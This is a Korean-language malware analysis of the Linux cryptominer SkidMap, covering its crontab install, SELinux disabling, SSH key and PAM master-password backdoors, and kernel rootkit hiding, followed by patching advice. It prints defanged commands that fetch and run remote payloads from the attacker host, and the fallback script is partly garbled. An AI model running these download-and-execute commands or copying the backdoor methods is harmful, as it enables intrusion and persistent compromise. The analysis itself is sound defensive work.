Linux 악성 코드 SkidMap 분석을 수행하는 방법

암호화폐 채굴 악성코드는 여전히 널리 퍼져 있는 위협입니다. 또한 사이버 범죄자들은 ​​모바일 장치, Unix 및 Unix 유사 시스템에서 서버 및 클라우드 환경에 이르기까지 마이닝 맬웨어를 더욱 악용하기 위해 새로운 플랫폼과 방법을 점점 더 모색하고 있습니다.

공격자들은 탐지에 저항하는 맬웨어의 능력을 계속해서 향상시키고 있습니다. 예를 들어, 불법 암호화폐 채굴 활동이 감염된 시스템에서 지속되도록 하기 위해 감시 구성 요소와 함께 악성 코드를 묶거나, LD_PRELOAD 기반 루트킷을 활용하여 해당 구성 요소를 시스템에서 사용할 수 없도록 만드는 Linux 기반 시스템을 포함합니다.

SkidMap이라는 Linux 악성코드가 최근 발견되었는데, 이는 점점 더 정교해지는 암호화폐 채굴 위협의 추세를 보여줍니다. 해당 악성코드는 악성 커널 모듈을 로드해 탐지할 수 없게 만드는 방식으로 작동해 주목을 받았다.

이러한 커널 모드 루트킷은 사용자 모드 루트킷보다 탐지하기가 더 어려울 뿐만 아니라 공격자가 영향을 받는 시스템에 액세스하는 데 사용될 수도 있습니다. Skidmap에는 시스템의 모든 사용자 계정에 대한 액세스를 제공하는 마스터 비밀번호를 설정하는 기능이 있습니다. SkidMap의 루틴 중 상당수는 루트 액세스가 필요하며 SkidMap에서 사용하는 공격 벡터(악용, 잘못된 구성 등)는 공격자에게 시스템에 대한 루트 또는 관리 액세스를 제공하는 것과 동일할 가능성이 높습니다.

Skidmap 감염 체인

악성 코드는 아래와 같이 crontab을 통해 대상 컴퓨터에 설치됩니다.

*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh

그런 다음 설치 스크립트 pm.sh는 기본 바이너리 "pc"를 다운로드합니다.

if [ -x "/usr/bin/wget"  -o  -x "/bin/wget" ]; then
   wget -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/curl"  -o  -x "/bin/curl" ]; then
   curl -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/get"  -o  -x "/bin/get" ]; then
   get -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/cur"  -o  -x "/bin/cur" ]; then
   cur -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc else
   url -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc fi

Execute" PC " 바이너리는 영향을 받는 시스템을 약화시키는 보안 설정을 변경합니다. /usr/sbin/setenforce 파일이 존재하는 경우 setenforce 0 명령을 사용하여 악성코드를 실행할 수 있습니다. 시스템에 /etc/selinux/config 파일이 있는 경우 selinux=disabled 및 selinux=targeted 명령을 파일에 기록합니다. 첫 번째 방법은 selinux 정책을 비활성화하거나 해당 정책이 로드되지 않도록 하는 것입니다. 두 번째 방법은 지정된 프로세스가 제한된 도메인에서 실행되도록 설정하는 것입니다.

SkidMap은 또한 바이너리가 인증에 필요한 키가 포함된 Authorized_keys 파일에 처리기의 공개 키를 추가하도록 하여 백도어를 제공합니다.

SkidMap은 백도어를 사용하는 것 외에 공격자가 시스템에 진입할 수 있는 또 다른 방법을 제공합니다. 악성코드는 시스템의 pam_unix.so 파일(표준 Unix 인증을 담당하는 모듈)을 자체 악성 버전(backdoor.linux.pamdor.a로 탐지됨)으로 대체합니다. 그림 2에 표시된 것처럼 이 악성 pam_unix.so 파일은 모든 사용자에 대해 특정 비밀번호를 허용하여 공격자가 컴퓨터의 모든 사용자로 로그인할 수 있도록 허용합니다.

SkidMap 암호화폐

"pc" 바이너리는 감염된 시스템의 운영 체제가 Debian인지 rhel/centos인지 확인합니다.

Debian 기반 시스템의 경우 암호화폐 채굴기 페이로드를 /tmp/miner2에 삭제합니다. centos/rhel 시스템의 경우 암호화폐 채굴기와 여러 구성 요소가 포함된 url hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz에서 tar 파일을 다운로드한 다음 압축을 풉니다. 그리고 설치하세요.

SkidMap의 기타 악성 구성 요소

악성 활동을 더욱 난독화하고 계속 실행되도록 설계된 악성 코드 구성 요소:

1 가짜 "rm" 바이너리: tar 파일에 포함된 구성 요소 중 하나는 " rm" rm" 바이너리 파일. 원본 파일을 대체합니다(rm은 파일 삭제 명령으로 자주 사용됩니다). 이 파일은 파일을 다운로드하고 실행하는 악의적인 크론 작업을 설정합니다.

kaudited 설치시 /usr/bin/kaudited 파일을 설치해주세요. 여러 개의 로드 가능한 커널 모듈(LKM)이 감염된 시스템의 이 바이너리에 설치됩니다. 커널 모드 루트킷을 발견할 때 감염된 컴퓨터가 충돌하는 것을 방지하기 위해 특정 커널 버전에 대해 다른 모듈을 사용합니다. kaudi된 바이너리는 감시 구성 요소도 제거합니다.

3. iproute, 이 모듈은 시스템 호출 getdents(보통 디렉토리의 내용을 읽는 데 사용됨)를 연결하여 특정 파일을 숨깁니다.

4. netlink는 네트워크 트래픽 및 CPU 관련 통계를 위조하여 감염된 시스템의 CPU 부하를 항상 낮게 보이게 만듭니다.

Solution

SkidMap은 상당히 진보된 방법을 사용하여 해당 구성 요소와 해당 구성 요소가 발견되지 않도록 합니다. SkidMap은 다양한 방법으로 영향을 받는 시스템에 액세스하여 이미 복구되었거나 치료된 시스템을 다시 감염시킬 수 있습니다.

암호화폐 채굴은 서버와 워크스테이션의 성능에 영향을 주어 비용이 높아질 뿐만 아니라 비즈니스에 지장을 줄 수도 있습니다. 많은 기업 환경에서 Linux를 사용하는 경우 사용자와 관리자는 시스템과 서버를 업데이트하고 패치를 적용해야 합니다. 확인되지 않은 타사 저장소를 주의하고 악성 파일이나 프로세스가 실행되지 않도록 해야 합니다.

IoC

위 내용은 Linux 악성 코드 SkidMap 분석을 수행하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!